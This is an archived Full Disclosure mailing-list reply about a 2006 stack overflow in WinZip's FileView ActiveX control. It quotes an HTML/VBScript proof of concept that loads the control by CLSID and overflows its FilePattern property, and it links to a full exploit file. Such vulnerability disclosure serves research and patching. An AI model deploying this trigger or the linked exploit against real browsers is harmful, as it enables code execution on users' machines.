Full Disclosure mailing list archives
Re: ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
From: Micheal Turner <wh1t3h4t3 () yahoo co uk>
Date: Wed, 15 Nov 2006 14:17:12 +0000 (GMT)
here we go, enjoy! https://prdelka.blackart.org.uk/exploitz/prdelka-vs-MS-winzip.c --- Micheal Turner <wh1t3h4t3 () yahoo co uk> wrote:
7245 correctly resolves this issue; standard stack overflow in WZFILEVIEW.FilePattern snatching EIP; PoC below; <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY> <SCRIPT LANGUAGE="VBScript"> <!-- Sub WZFILEVIEW_OnAfterItemAdd(Item) WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE" end sub --> </SCRIPT> <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
</OBJECT> </BODY> </HTML> -- prdelka
___________________________________________________________
All new Yahoo! Mail "The new Interface is stunning in its simplicity and ease of use." - PC Magazine http://uk.docs.yahoo.com/nowyoucan.html _______________________________________________ Full-Disclosure - We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Send instant messages to your online friends http://uk.messenger.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability zdi-disclosures (Nov 14)
- Re: ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability Micheal Turner (Nov 14)
- Re: ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability Micheal Turner (Nov 15)
- Re: ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability Micheal Turner (Nov 14)